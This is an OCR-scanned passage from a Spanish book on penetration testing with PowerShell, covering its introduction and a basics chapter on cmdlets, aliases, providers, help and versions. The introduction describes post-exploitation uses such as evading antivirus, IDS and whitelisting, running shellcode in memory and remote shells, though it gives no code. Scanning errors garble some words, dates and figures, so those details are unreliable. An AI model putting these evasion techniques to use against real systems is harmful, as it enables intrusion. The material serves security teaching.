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Introducción 


Powershell ha aumentado exponencialmente su uso en los test de intrusión del sector profesional 
de la Seguridad de la Información. El motivo por el que Powershell es más utilizado en los test de 
intrusión es debido a todo el potencial que la línea de comandos ofrece, sobre todo, en la etapa de 
post-explotación. 


Diversas charlas de muchos investigadores alrededor del mundo explican las ventajas que la línea de 
comandos de Microsoft aporta. En muchas ocasiones, un auditor puede encontrarse con mecanismos 
que eviten que se pueda lanzar herramientas de auditoría sobre ciertos equipos de una red. La 
posibilidad de ejecutar ciertas herramientas o scripts directamente en memoria, hacen de Powershell 
una punto a favor en la auditoría. Además, muchos administradores de sistemas y redes pueden 
evitar la ejecución de una cmd, pero por desconocimiento no se prohíbe la ejecución de Powershell, 
aunque claramente ésta aporta mucho más potencial que la cmd clásica de Microsofi. 


Powershell puede utilizarse también en las fases de gathering y explotación, sin estar limitado a 
la fase de post-explotación, dónde se saca su mejor provecho. Desde hace unos años hay muchos 
investigadores que han ido creando diferentes frameworks de Powershell aportando diferentes 
funciones y herramientas que ayudan a contemplar estas 3 etapas de un pentest. Durante el desarrollo 
del libro se ha enfocado siempre a Powershel! como herramienta de auditoría en las 3 fases indicadas 
anteriormente. 


En el primer capítulo se propone una introducción y un uso básico de Powershell para aquellos 
auditores y pentesters que no hayan trabajado anteriormente con ella. Microsoft propuso una sintaxis 
y un modelo de alias similar al de los sistemas UNIX, por lo que el paso de una consola a otra es 
rápido. Hay que indicar que Powershell es una consola de objetos y no de strings. como es el caso 
de Bash. 


En el segundo capítulo se trata el tema del desarrollo de scripts explicando las estructuras básicas y 
avanzadas que pueden ser utilizadas para que el lector pueda desarrollar sus propios scripts y exploits. 
Además, el lector irá guiado con diferentes ejemplos que ayudan y simplifican el aprendizaje de toda 
la información. 


En el tercer capítulo, el cual ocupa gran parte del libro, se detallan las herramientas que existen en 
la actualidad con Powershell para llevar a cabo auditorías. Se detallan los diferentes frameworks 
ejemplificando mediante pruebas de concepto cómo el auditor puede aprovechar el máximo de 
éstos. El número de herramientas es alto y se pueden ver diferentes funciones fundamentales en 
una auditoría, todas ellas ejecutadas desde Powershell. Ejecutar un mimikatz creado en Powershell, 
disponer de una navaja suiza con Powercat, ejecutar una shellcode en memoria, bypassear 


| 14 | Pentesting con PowerShell 


mecanismos de seguridad como antivirus, crear ficheros maliciosos para ataques client-side, reflejar 
una Powershell interactiva en remoto para su control, realizar escaneos de puertos de redes sin 
necesidad de disponer de nmap, etcétera. 


En el cuarto capítulo se presentan diferentes herramientas que hacen uso de Powershell para mejorar 
el pentest. Se detallará como Metasploit dispone de un payload interactivo que ofrece la línea de 
comandos, como existe un conjunto de scripts que interaccionan con Metasploit, como con SET, 
Social Engineering Toolkit, se proporciona código de Powershell que puede otorgar el control 
remoto de una máquina con acceso físico, o como existen herramientas en Python que ayudan a 
tomar el control de máquinas a través de Powershell. 


En definitiva, el libro presenta al pentester que la fase de post-explotación tiene una nueva visión 
gracias a la consola de Microsoft, la cual tiene acceso a todo el sistema operativo de manera sencilla 
y a los productos de la empresa de Redmond. Además, no hay que olvidar que la fase de gathering 
y explotación también está contemplada hoy en día con Powershell. 
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Capítulo I 
Conceptos básicos de PowerShell 


1. ¿Qué es y qué engloba a PowerShell? 


Hace unos años Microsoft apostó por un cambio en lo que a líneas de comando se refiere. Con 
este cambio llegó PowerShell, la cual es la línea de comandos basada en .NET Framework, muy 
flexible y con gran potencia. Gracias a esta línea de comandos el usuario puede administrar los 
sistemas, tanto locales como remotos, y puede automatizar las tareas mediante el desarrollo de 
scripts, gestionando los diferentes productos de la empresa de Redmond. 


EJ Windows PowerShell 


Windows PowerShell 
Copyright <C> 2889 Microsoft Corporation. Reservados todos los derechos. 


PS C:NUsersNbit? . 


Fig. 1.01: Línea de comandos de PowerShell. 


PowerShell amplía de largo las capacidades de interacción de la cmd clásica de Windows y dispone 
de características o módulos que aportan nuevas funcionalidades cuando son cargados. Hay que 
entender que esta poderosa línea de comandos no es sólo una evolución de una cmd, como algunos 
usuarios o administradores pueden llegar a pensar, es una de las herramientas más poderosas para là 
gestión de máquinas y dominios Microsoft. Esto hace pensar que llevada al ámbito de una auditoría 
de seguridad o pentest se pueda pensar que los límites no existen con esta herramienta. 


La riqueza que ofrece PowerShell reside en el tratamiento de objetos y no de cadenas de texto, como 
ocurre por ejemplo en Bash. Este aspecto es innovador, ya que generalmente este tipo de lineas de 
comandos hacen tratamiento de cadenas de texto. El manejo de objetos de PowerShell proviene de la 
herencia que proporciona .NET Framework. Este framework es muy conocido por los desarrolladores 
de aplicaciones pero no es muy trabajado por los administradores u otros profesionales TI. 
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2. Instalación de una PowerShell 


PowerShell puede ser instalada mediante ejecutable descargado desde el sitio web oficial de 
Microsoft. Hay que tener en cuenta que desde la versión de Windows 7 o Windows Server 2008 R2 
viene por defecto instalada. Por supuesto en versiones posteriores, como Windows 8, Windows 8.1 o 
Windows Server 2012 también. 


Los requisitos 

El requisito de PowerShell es .NET Framework. Esta línea de comandos está basada en .NET 
Framework por lo que la instalación depende totalmente de tener este framework instalado en la 
máquina. 


La versión mínima requerida de .NET Framework es la 2.0, pero se puede disponer además de 
versiones superiores. En los sistemas operativos Windows 7 y Windows Server 2008 R2 el framework 
viene integrado en su versión 2.0, 3.0 y 3.5, al igual que viene integrado la versión 2.0 de PowerShell. 
La versión 1.0 de PowerShell no es compatible con Windows 7 y Windows 2008 R2. 


Windows Vista y Windows Server 2008 R2 integran tanto .NET Framework 2.0 como el 3.0, siendo 
opcional su instalación la versión 3.5. Para instalar PowerShell 1.0 sobre Windows Vista se necesita 
descargar su ejecutable e instalarlo. El nombre de los ejecutables son Windows6.0- KB928439- x86. 
msu y Windows6.0- KB928439- x64.msu, en función de si es para 32 o 64 bit. Para la instalación de 
la versión 1.0 sobre Windows Server 2008 no se necesita descargar ya que viene integrado pero no 
activado, se debe activar como componente adicional. 


Para instalar PowerShell 2.0 sobre Vista y 2008 se necesita descargar adicionalmente el ejecutable 
desde la página web de Microsoft. Hay que recalcar que en Vista se necesita SP1. El nombre de los 
ejecutables son Windows6.0- KB968930- x86.msu y Windows6.0- KB968930- x64.msu. 


En Windows Server 2003/R2 se necesita instalar manualmente .NET Framework 2.0 y opcionalmente 
la versión 3.0 y 3.5. Para instalar PowerShell 1.0 sobre Windows Server 2003 se necesita descargar 
el ejecutable WindowsServer2003- KB926140-v5-x86- ES.exe desde la página web de Microsoft. 
Además se requiere que esta versión del servidor disponga del service pack SP1 como mínimo. 
Por otro lado en Windows Server 2003 R2 sólo hay que obtener el ejecutable WindowsServer2003. 
WindowsXP- KB926139-v2 -x64-ENU.exe y realizar su instalación. 


Para instalar PowerShell 2.0 sobre Windows Server 2003 se requiere que el SP2 se encuentre instalado 
sobre el sistema operativo y la descarga del ejecutable WindowsServer2003- KB968930-x86- ES.exe 
o WindowsServer2003- KB968930-x64- ES.exe. Los mismos requisitos son los necesarios para 
Windows Server 2003 R2. 


En Windows XP se requiere la instalación de .NET Framework 2.0 y opcionalmente las versiones 
superiores 3.0 y 3.5. Para la instalación de PowerShell 1.0 se requiere la descarga del ejecutable 
WindowsXP- KB926140- v5-x86- ES.exe y disponer del SP2 instalado como mínimo. Para la 
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instalación de PowerShell 2.0 se requiere la descarga del ejecutable WindowsXP- KB968930- x86- 
ES.exe y el service pack SP3 de Windows XP. 


Las siguientes URL son para las descargas de PowerShell desde el sitio web de Microsoft: 

- PowerShell 1.0 en Windows Vista, http:/support.microsoft.com/kb/928439/es. 

- PowerShell 2.0 en Windows Vista y Windows Server 2008, http://support.microsoft.com/ 
kb/968929/es. 

- PowerShell 1.0 en Windows XP y Windows Server 2003, http://support.microsoft.com/ 
kb/926140/es. 

- PowerShell 2.0 en Windows XP y Windows Server 2003. http://support.microsoft.com/ 
kb/968929/es. 


Cuando se descarga desde el sitio web de Microsoft alguna versión de PowerShell se debe elegir 
entre un paquete de instalación localizado o en inglés. Un paquete de instalación localizado es una 
instalación de PowerShell para sistemas operativos Windows en alemán, español, francés, italiano, 
japonés, coreano, portugués, ruso, chino simplificado o tradicional. 


Por otro lado un paquete de instalación en inglés se utiliza para los sistemas operativos Windows en 
inglés o una versión en un idioma que no se encuentre en el paquete de instalación localizado. 


Hay que recalcar que los paquetes de idioma MUI, (Multilingual User Interface), son necesarios si 
se está ejecutando una versión multilingüe de la interfaz de usuario de Windows. Para estos paquetes 
de idioma, se debe instalar en primer lugar la versión de PowerShell y a continuación el paquete 
MUI. 


Nombre del archivo: Descr 
WindowsServer2003-KB926 140-v5-x86-ESN.exe 


Detalles rápidos 


Versión: 

Fecha de publicación: 

Cambiar idioma: | Español 

Alemán i Internet Explorer. Hay una 


Chino (simplificado; nueva versión de tu 
Chino (tradiciona!) navegador. Mejora tu 


P experiencia web. 
Artículos de soporte Coreano Descárgatela aqui 


Tiempo de descarga estimado: 


Francés 

Inglés 

Italiano 

Japones 

as Portugués (Brasil) 
Información general hise 


Fig. 1.02: Elección de idioma en la descarga de PowerShell. 
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3. ¿Cómo puede ayudar en un pentest? 


Un pentester tiene miles de situaciones, condiciones y ambientes diferentes. Por esta razón, cuando 
uno se enfrenta a un entorno en el que no se puede disponer de ciertas herramientas para la realización 
del pentest se debe utilizar el potencial de la imaginación para conseguir los objetivos propuestas 
con anterioridad. 


El congreso Qurtuba Security Congress de la ciudad de Córdoba tuve la posibilidad de presentar 
una charla en la que se mostraba como gracias a herramientas nativas de los sistemas operativos 
Microsoft de ültima generación se puede ejecutar cualquier tipo de código, a través de la línea de 
comandos PowerShell. De este modo, no se echará en falta la no posibilidad de ejecutar herramientas 
clásicas como nmap, cain & abel, foca, etcétera. El nombre de la charla que presenté se denominó 
"Give me a PowerShell and I will move your world". 


Hay que analizar algunas charlas que se han llevado a cabo, sobretodo en clásicas como Shmoocon o 
Black Hat, para entender toda la potencia que PowerShell ofrece en un pentest. Además, conociendo 
algunos métodos para llevar a cabo un bypass de las políticas de ejecución de código de PowerShell y 
jugando con los frameworks que han ido apareciendo, como PowerSploit, Nishang o Posh-Sec Mod, 
se puede montar un pequeño bot útil para entornos difíciles, entornos con alta monitorización de 
elementos de seguridad o entornos a los cuales el bor pudiera acceder, pero no así el pentester. Esto 
es una de las cosas que se presentaba en el trabajo indicado anteriormente en Qurtuba Security 
Congress. 


¿Para qué es muy potente PowerShell en un pentest? A continuación, se enumeran las diferentes 
acciones que pueden llevarse a cabo nativamente desde la línea de comandos de Microsoft: 


- Ejecución de código. 
- No generación de demasiado tráfico o éste pasa desapercibido. 
Posibilidad de utilización de proxies. 


Evasión de elementos de seguridad, como puede ser el antivirus, un IDS, /ntrusion 
Detection System, o un IPS, /ntrusion Prevention System. 


- Modificación de scripts o binarios. 

- Etapa de descubrimiento y recopilación de información del entorno. 

- &Encapsulación de tráfico. 

- Conectividad y pivoting. 

- Escaneo de puertos y fingerprinting. 

- Evitar las whitelisting de aplicaciones. En ciertos entornos se puede tener configurado una 


lista blanca de aplicaciones que pueden ser ejecutadas. Los scripts se lanzarán a través de 
PowerShell, pudiendo evitar esta lista blanca. 


En resumen, el pentester puede encontrarse en condiciones y un entorno difícil, en el cual no dispone 
de herramientas. La única, y más que suficiente, herramienta que dispone de forma nativa en los 
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equipos a los que tiene acceso es PowerShell. Con esta herramienta se podrían hacer muchas cosas, e 
interactuar con gran cantidad de productos de Microsoft, por lo que el pentes! puede llevarse a cabo. 
Además, gracias a los frameworks énunciados anteriormente, existe gran cantidad de herramientas 
con código PowerShell que facilitan estas tareas. 


4. Versiones 


Hasta la versión de Windows 8.7 existen 4 versiones liberadas de PowerShell. Se espera que con 
Windows 10 se libere la versión 5 de PowerShell. Para conocer la versión de PowerShell que ejecuta 
una máquina se puede utilizar el comando Get-Host, el cual proporciona diferente información sobre 
el entorno. 


En muchos libros o artículos en Internet se puede leer como definen a PowerShell como la nueva 
línea de comandos de Microsoft. Este es un dato erróneo ya que el proyecto comenzó en el año 2003 
bajo el nombre de MONAD. En 2006 fue lanzada al público con el nombre oficial de PowerShell 1.0. 


PowerShell 1.0 


Lanzada en Abril de 2006 para aumentar las capacidades y las limitaciones del CMD clásico a la vez 
que cubría ámbitos a los que la consola clásica de Microsoft no se acercaba. 


Una de las características más interesantes que presentó PowerShell fue la manipulación de objetos 
respecto a otras shell, las cuales manipulan cadenas de texto. Esto implica la posibilidad de disponer 
de propiedades dentro de los objetos otorgando mayor riqueza semántica al lenguaje de scripting y 
a la interacción con la máquina. 


PowerShell presentó 129 utilidades estándar, también conocidos como cmdlets de los cuales se 
hablará más adelante. Con los cmdlets se puede realizar distintas tareas administrativas como 
gestionar el registro, el sistema de archivos, monitorizar procesos, etcétera. 


PowerShell 2.0 
lanzada en Julio de 2009 proporcionó bastantes cambios y mejoras a la versión 1.0. Algunas de las 
huevas características son las siguientes: 

- Interacción remota con uno o varios equipos. 

- Entorno gráfico denominado PowerShell ISE, Integrated Scripting Environment. 

- Módulos para mejorar el desarrollo del código, creando unidades independientes. 


- Nuevos cmdlets. La versión 2.0 introduce más de 100 cmalets integrados nuevos respecto 
a la versión 1.0. 


- Ejecución en segundo plano de un trabajo. 
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PowerShell 3.0 


Las características que marcan esta versión son las siguientes: 
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- Flujos de trabajo. 

- PowerShell Web Access. 

- Nuevas características en el entorno de desarrollo PowerShell ISE. 
- Integración de CIM. 

- Nuevas características de Windows PowerShell. 

- Carga automática de módulos. 

- Compatibilidad con RunAs y host compartido. 

- Nuevas API de cmdlets. 


PowerShell 4.0 
Las características que marcan esta versión son las siguientes: 
- Nuevas características de Windows PowerShell. 
- Nuevas características del entorno de desarrollo y mejoras en PowerShell ISE 
- Mejoras en los flujos de trabajo introducidos en la versión anterior. 
- Nuevas características de servicios web en PowerShell. 
- Mejoras en PowerShell Web Access. 


- Corrección de errores en versiones anteriores. 


5. Lo más básico: Comenzando 


En este apartado se explican los conceptos más importantes, los cuales se utilizarán y leerán durante 
el contenido del libro. Estos conceptos y definiciones son los pilares básicos sobre los que PowerShell 


se asienta para otorgar al pentester todas las posibilidades 


Cmdlet 


Un cmdlet es una instancia de una clase de .NET Framework, aunque en este libro se les llame 
comandos en algunas ocasiones. Un cmdler procesa objetos de entrada desde una canalización de 
objeto en vez de desde una secuencia de texto. Este no analiza sus propios argumentos ni especifica 
una presentación de errores. Esto simplifica el proceso de creación de un emdlet. 


Estos comandos están orientados a realizar una tarea concreta manipulando para ello objetos de 


PowerShell. El diseño de PowerShell hace que sea sencillo reconocer un cmdlet ya que éstos tienen 
un formato orientado al lenguaje natural. 
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Los nombres de los cmdlet constan de 2 partes, <verbo>-<nombre>. La parte del verbo indica la 
acción que se va a realizar con la ejecución del emdlet y la parte del nombre indica el recurso sobre el 
que el emdlet realizará la acción. Todos los emdlet disponen de este sencillo formato mnemotécnico 


La ejecución de un emdlet no es case sensitive, por lo que es independiente de si se escribe en 
mayúsculas o minúsculas. No es necesario aprender todos los cmd/et que PowerShell contiene ya 
que se dispone de herramientas para obtener los distintos cmdlet. 


Alias 

Los alias son mecanismos que facilitan la interacción con la línea de comandos. Los alias 
proporcionan un método para recordar un cmdlet o expresiones con otro nombre, con el cual el 
usuario se siente más identificado. Esta línea de comandos proporciona por defecto diversos alias, 
los cuales el usuario puede visualizar a través del cmdlet Get-Alias. 


PS Cillserssbit> Get-filias 


Name Definition 


% ForEach-Object 

? Where-Object 

AnD fidd-PSSnapIn 

cat Get-Content 

cd Set-Location 

chdir Set-Location 

clc Clear-Content 
clear Clear-Host 

clhy Clear-History 

cli Clear-Item 

clp Clear-ItemProperty 
cls Clear-Host 

clu Clear-Variable 
compare Conpare-Object 

5 Copy-Item 
Copy-Item 
Copy-Item 
Copu-ItemPropertu 
Convert-Path 
Disable-PSBreakpoint 
Remove-Item 
Compare-Object 
Get-Childltem 
Enable-PSBreakpoint 
Urite-Output 
Export-filias 


Fig. 1.03: Ejecución del emldet get-alias y obtención de los alias disponibles 


Al ejecutar un alias en PowerShell se ejecuta un emdlet o función que se encuentra asociado al alias 
invocado. Además, se puede ejecutar el cmalet Get-Alias en la línea de comandos para conocer que 


emdler están asociados a los alias. 


Muchos usuarios o pentesters están acostumbrados a utilizar shells en entornos como GNL /Linux 

En PowerShell. para lograr una transición o un acomodamiento a la sintaxis, existen facilidades 
mnemotécnicas como de accesibilidad. De esta forma el usuario tendrá un trabajo más fácil en el uso 
de esta línea de comandos. El mundo *NZX ha sido ojeado por la parte de Microsoft para configurar 
alias por defecto cercanos a los comandos que se puede encontrar en el mundo *V/X. Con esta 
acción se ha conseguido que el paso del mundo UNIX a PowerShell sea más sencillo. 
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Comandos *NIX y CMD en PowerShell 


Los usuarios y pentesters que utilizan sistemas UNIX que lleguen a PowerShell pueden utilizar los 
alias como estrategia para hacer una transición más sencilla. 


A continuación se muestran diferentes alias utilizados en PowerShell y los cmdlets asociados a 
dichos alias. 


cd 


Tabla 1.01: Ejemplo de alias UNIX y su emdlet equivalente 


Desde PowerShell se puede lanzar una cmd y los comandos de ésta también, ya que al final son 
ejecutables o ficheros exe que eran invocados. 


Provider 

El provider o proveedor es una aplicación basada en .NET Framework la cual facilita el tratamiento 
de los datos. Los datos serán mostrados en un almacén para que puedan ser gestionados de manera 
sencilla, El usuario puede navegar por el almacén como si se tratase del sistema de ficheros, esta 
aplicación consigue que la gestión del registro, entre otros, sea muy sencilla en PowerShell. 


En PowerShell se disponen de distintos tipos de proveedores. En la siguiente tabla se pueden 
visualizar de proveedores que se pueden encontrar en PowerShell, y que pueden ser útiles. Hay que 
recordar que en la parte de desarrollo de scripts, se puede necesitar de estos providers para realizar 
acciones lo más sencillo posible. Además, los frameworks que se estudiarán más adelante y que 
ayudan a la realización de un pentesting con PowerShell utilizan, entre otras muchas cosas, este tipo 
de aplicaciones. 


Proveedor Descripción 


> Acceso a los alias que en el entorno de 
Alias 
PowerShell y sus valores 
Certificados 


set-location alias: 


Acceso a certificados y almacenes de 
certificados X509. Sólo lectura 


set-location cert: 
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Acceso a las variables de entorno de 
Windows 


Comando 


Proveedor 


Entorno 


Sistema de archivos 


Registro 


WSMan 


Funciones 


set-location env: 


El proveedor básico. Acceso a archivos y 
directorios 


set-location «unidad? 


set-location 


IHKCU,HKLM): 


Acceso a las claves y valores del registro 
de Windows 


Acceso a la información de configuración 
de WSMan 


Acceso a las variables del entorno de 
PowerShell y sus valores 


set-location wsman: 


set-location variable: 


Acceso a las funciones definidas en el 
entorno de PowerShell 


set-location function: 


Tabla 1.02: Definiciones de los proveedores por defecto 


PS C:NUsers*bit? Set-Location hkcu: 
PS HKCU:N? Get-ChildIten 


Hive: HKEY CURRENT. USER 


UC Name 


AppEvents 


O 
(ColorTable00,. ColorTable81, ColorTable82, ColorTableB3...> 
oO 


Environment (TEMP, TMP, MOZ_PLUGIN_PATH> 

EUDC O 

Identities 
board Layout 
uork 


o 
(Identity Ordinal, Migrated7, Last Username, Last User ID... 


tuare 
Systen 


O 
O 
O 
«2 
Sys <?) 
Volatile Environnent <L 


OGONSERUER, USERDOMAIN. USERNAME, USERPROFILE. 


3 HKCU => 


Fig. 1.04: Ejecución de un proveedor que permite gestionar el registro en la rita HKCU 


El comando Ser-Location permite moverse entre directorios, si por ejemplo la línea de comandos 
se encuentra en el proveedor del sistema de archivos. También permite cambiar entre proveedores a 
alguno de los que se encuentran en la tabla anterior. 


Además, un usuario puede utilizar los diferentes alias para este comando, como son chdir o cd. 


S C:NUsers*bit? Get-Alias -Definition set-location 


Name 


cd Set-Location 
chdir Set-Location 
sl Set-Location 


Ss 


Fig. 1.05: Obtención de los alias de set-location. 
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Parámetros 


Los parámetros son modificadores que se añaden a un cmdlet para cambiar el modo de ejecución de 
dicho comando. En otras palabras, un cmdlet puede realizar distintas subtareas dentro de su tarea 
principal y los parámetros activan dichas subtareas. Los parámetros son añadidos después de la 
llamada al cmdler y precedidos de un guion, <cmdlet> -parámetro 1 -parámetro 2 ... -parámetro 
N. Resulta muy interesante entender que los parámetros de PowerShell son, casi en su totalidad, 
nombres coherentes. 


PS CiNUsersNbit> Get-fllias -Name w* 


Name Definition 


where Where-Object 
wjb Hait-Job 
write Mrite-Output 


Fig. 1.06: Ejecución de get-alias con el parámetro name para el filtrado de la salida. 


Los parámetros pueden ser clasificados por la función que desempeñan. A continuación se muestra 
la clasificación: 
- Parámetro de ayuda. Este tipo está presente en todos los emdlets. Para invocarlo se debe 


indicar -?. Cuando se realiza esta acción el cmdlet no se ejecuta, pero PowerShell muestra el 
contenido de la ayuda asociado al comando. 


- Parámetros dinámicos. Estos parámetros se añadirán a los emdlets. a los propios scripts, 
proveedores o funciones, siempre y cuando se cumplan ciertas condiciones. 


- Parámetros comunes. Son parámetros que se compartan siempre de la misma manera, 
siempre y cuando el cmdler los implemente, Los parámetros comunes son Whatlf, Confirm, 
Verbose, Debug, Warn, ErrorAction, ErrorVariable, OutVariable y OutBuffer. 


- Parámetros conmutados o switch parameter. Estos parámetros funcionan como 
interruptores, es decir, pueden ir activados en la ejecución del cmdlet o función o no aparecer. 
Además, este tipo de parámetros pueden recoger un argumento o no. Estos parámetros son 
muy utilizados en funciones para poder ejecutar diferentes comportamientos, a través de 
valores booleanos. 


- Conjuntos de parámetros. Este grupo de parámetros son utilizados en un mismo emdlet 
para llevar a cabo una acción concreta. 


Archivos 


Los archivos son algo fundamental para cualquier sistema, ya que es la manera más sencilla de 
almacenar los datos de forma persistente. Los distintos formatos en los que la información puede 
ser presentada también es importante y esta línea de comandos los valora. En PowerShell se puede 
observar distintos tipos de archivos. Entre los más importantes o interesantes se encuentran: 


- Archivo de datos. Este archivo dispone de extensión .psdl y se realiza para diversos 
propósitos, almacenar el manifiesto de un módulo o almacenar los strings para la 
internacionalización del script. 
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- Archivo de módulo. Este archivo tiene extensión .psml y contiene un seripr. Este script 
define los miembros que se exportan de él. 

- Archivo de formato. El archivo utiliza una extensión del tipo .format.ps1xm/ y proporciona 
una definición de cómo PowerShell debe mostrar un objeto. 

- Archivo de script. Este es el más básico de todos, ya que contiene Jas líneas que 
implementan las funcionalidades que se quieren automatizar. La extensión utilizada por este 
tipo de archivos es .ps/. En otras palabras, este tipo de archivos contiene el código que se 
ejecutará en PowerShell. 

- Archivo de tipo. Este archivo dispone la extensión .psIxml y se encarga de heredar las 
propiedades de los tipos de .NET Framework. 


Es importante tener en cuenta que siendo la primera vez que se ejecute PowerShell el usuario se 
encontrará con la negación de la linea de comandos al ejecutar un script. Esto es debido a que 
la política de seguridad definida por defecto en PowerShell es la de restricted. lo cual evitará la 


ejecución de cualquier script. 


Pipe y pipeline | 
Un pipe tiene una definición clásica, y no es más que una tubería que conecta la salida de un proceso 
con la entrada de otro. Dicho de otro modo, el resultado del procesamiento de un cimd/et puede salir, 
a través del pipe, y ser la entrada de otro cmdlet. Un ejemplo sencillo sería el siguiente <cmdler 1> 
<emdlet 27. 
El pipeline es el conjunto de cmdler que envían sus resultados a otro cmdlet. En otras palabras, se 
conecta la salida por pantalla que devuelve el cmdlet 1 a la entrada del emdlet 2, éste ejecuta y los 
resultados los envía al emdlet 3. Este proceso se repite en función del número de concatenaciones 


que el usuario requiera. 
PS C:NUsers*Nbit? Get-Process | sort -Descending id ! Select-Object -First 4 


Handles  NPMCK5 < WSCK) UMCM> ; ) Pr ; Nane 


87084 A: 5,42 chrome 
2324 « OSPPSUC 


: 326: E x chrome 
40340 202 E] suchost 
Fig. 1.07: Ejecución en un pipeline 


Módulos 


Los módulos en PowerShell son paquetes que permiten extender y disponer de escalabilidad en el 
lenguaje de scripting y la propia interacción con la shell. Los módulos agrupan otros scripts, emálets 
o funciones permitiendo compartir otras funcionalidades sin tener que rescribirlas en el código del 
script. 


Sobre todo en las versiones servidor de Windows la línea de comandos proporciona diferentes 
módulos al usuario, Estos módulos proporcionan funcionalidad extra e interesante para llevar a cabo 
la gestión de sistemas y productos Microsoft. También pueden ser útiles en escenarios de pentesting. 
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Los módulos, en general, son muy ütiles para compartir y beneficiar a otros usuarios. Existen 
cientos de funcionalidades que pueden ser compartidas gracias a la importación de módulos en 
PowerShell. Simplemente, hay que recordar los frameworks de pentesting disponibles en la red, y 
que proporcionan cientos de funcionalidades que pueden ser utilizadas. 


Para visualizar los módulos disponibles se ejecutaría el cmdlet ger-module con el parámetro 
ListAvailable, de la siguiente manera get-module -ListAvailable. 


6. La ayuda en PowerShell al detalle 


La ayuda en la línea de comandos es fundamental. Hoy día se dispone de Internet y todos los 
recursos que éste ofrece, como la parte Technet de Microsoft, pero en muchas ocasiones, lo más 
rápido es utilizar la ayuda que viene con la propia línea de comandos. PowerShell proporciona una 
ayuda clasificada por extensión de información, es decir, se podrá obtener información con mayor o 
menor detalle, e incluso con ejemplos. 


Existe un cmdlet que ejecuta la tarea de la ayuda denominado ge/-help. Existe la función help que 
es muy útil como se verá posteriormente. Existen también alias como man, nomenclatura cercana a 
los entornos *N/X. Y también se dispone del parámetro, común a todos los cmdlet, -? con el que el 
usuario puede revisar la ayuda del cmdlet en cuestión. 


Hay que recalcar que la ayuda viene en el idioma de la versión instalada, esto ayudará a muchos 
usuarios a poder entender mejor el funcionamiento de PowerShell. 


Existen 3 niveles de profundidad en la ayuda de PowerShell: 


- Ayuda por defecto o estándar. Cuando se ejecuta el cmdlet get-help, alguno de sus alias o 
el parámetro de ayuda, éste es el tipo de ayuda que se ofrece para la visualización por parte 
del usuario. No incluirá ejemplos en la ayuda. 


- Ayuda en detalle o detallada. La información que se ofrece es considerablemente 
mayor que en la ayuda estándar. Se ofrece gran cantidad de ejemplos de uso sobre la ayuda 
requerida. Esta ayuda se obtiene ejecutando el parámetro derailed en la petición de la ayuda, 
por ejemplo, get-help «comando? -detailed. 


- Ayuda completa. La información que se ofrece es, también, mayor que en la ayuda 
estándar. Además ofrece información técnica sobre la ayuda requerida. Para obtener esta 
ayuda se debe ejecutar get-help «comando? -full. 


Otra opción para mostrar ejemplos directamente es utilizar el parámetro examples, a través de la 
siguiente instrucción Get-Help <comando> -examples. Además, la ayuda en PowerShell proporciona 
más información que la que se ofrece de los cmdlet. Una opción es ejecutar el alias help * y se 
obtendrá una lista con todos los nombres, categorías y sinopsis. En el capítulo de scripting puede 
ser útil la ayuda de las estructuras condiciones o de bucles. Para invocarlas se puede ejecutar la 


— E 


instrucción help if. Cuando se obtiene una página de ayuda, ésta se divide en apartados correctamente 
formateados para que su visualización y entendimiento no supongan un problema. 
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¿Help o get-help? 
Help permite visualizar de manera sencilla las páginas de ayuda de la línea de comandos, ya que 
la salida de la función help proporciona las páginas formateadas. Proporciona diferentes niveles de 
rofundidad, como puede ser en detalle o completa. El cmdlet Get-Help saca toda la información 
por la salida estándar de la línea de comandos, es decir por pantalla, sin ningün tipo de formato. De 
esta manera se puede entender que help y Get-Help pueden parecer iguales, pero no lo son. Para 
equiparar a Get-Help con la función help se podría utilizar un pipe y la función more de la siguiente 
manera Get-Help <cmdlet> -detailed | more. 


L4 
Categorias 
Cuando se ejecuta la sentencia Ger-Help * se obtiene una columna que es categoría. Esta columna 
indica qué es realmente sobre lo que se solicita la ayuda. Se puede observar que no solo existe ayuda 


para los cmdlet. 


Las distintas categorías de la ayuda en PowerShell son las siguientes: 


- Cmdlet. 

- Proveedores. 

- Funciones. 

- Alias. 

- Archivo de ayuda. 


Los archivos de ayuda son muy interesantes ya que ofrecen información detallada, por ejemplo, 
sobre los componentes sintácticos del lenguaje de scripting de PowerShell. Vienen definidos con 
una gran cantidad de ejemplos. 


Atajos de teclado 

Siempre han sido ütiles en el día a día los atajos de teclado, y más en un mundo en el que el tiempo 
cada vez es más necesario. Por este tipo de razones se hace hincapié en cómo pueden hacerse uso de 
éstos en la línea de comandos PowerShell. Al principio, estos atajos pueden ser difíciles de recordar, 
pero su uso en el día a día facilitará la rápida interacción con la línea de comandos. 


Hay diferentes tipos de atajos de teclado, todos ellos realmente interesante. El primero de ellos que 
se presenta es el uso del tabulador, al igual que se hace en Bash. A partir de ahora al tabulador se 
le denominará tab. Con la tecla tab el usuario puede autocompletar o ver las coincidencias con lo 
que está buscando. El funcionamiento de tab mediante un ejemplo es sencillo, se escribe get y al 


[287 Pentesting con PowerShell 


pulsar sobre tab se irá visualizando las distintas posibilidades de coincidencia con los cmdlet. Tab es 
aplicable a parámetros y otros elementos del entorno de PowerShell. Otro de los atajos interesantes 
y útiles es CTRL + Flecha derecha / izquierda. Esta combinación permite al usuario recorrer una 
sentencia palabra a palabra. Además, el curso es colocado al principio de cada una de las palabras. 


Las teclas F7, F8 y F9 proporcionan acceso rápido al histórico de instrucciones ejecutadas. La tecla 
F7 proporciona al usuario un listado, mediante la visualización de un cuadro de diálogo en consola, 
de las últimas instrucciones ejecutadas en el entorno actual. La tecla F8 introduce en la misma línea 
de comandos las últimas instrucciones, para que directamente el usuario pueda ejecutarlas. La tecla 
F9 pregunta, mediante un cuadro de diálogo en el entorno, por el número asociado a la instrucción 
que se puede visualizar con F7. 


Más atajos interesantes con CTRL + C, con el cual la ejecución de un proceso es finalizada. Además, 
la tecla INICIO y FIN del teclado, sitúan el cursor al principio o al final de la línea de comandos. 
Esto es interesante, sobre todo si la instrucción es larga y se requiere cambiar algo. Por último, la 
flecha arriba y abajo permite realizar un desplazamiento por el histórico de instrucciones que han 
sido ejecutadas con anterioridad por el usuario. 


7.Seguridad en PowerShell 


Hoy en día la seguridad ha comenzado a ser importante en un entorno empresarial, e incluso para 
muchos usuarios su privacidad y confidencialidad es una cuestión importante en sus vidas. Por estas 
razones, la seguridad informática intenta evitar que los datos e información más sensible queden 
en mano de los usuarios maliciosos. Se utilizan políticas para evitar que ciertos grupos de usuarios 
realicen ciertas acciones, se cifran contenidos o archivos, se segmentan los accesos a los equipos, se 
registran esos accesos, etcétera. 


En la línea de comandos de PowerShell existen diferentes políticas que evitan que ciertos scripts 
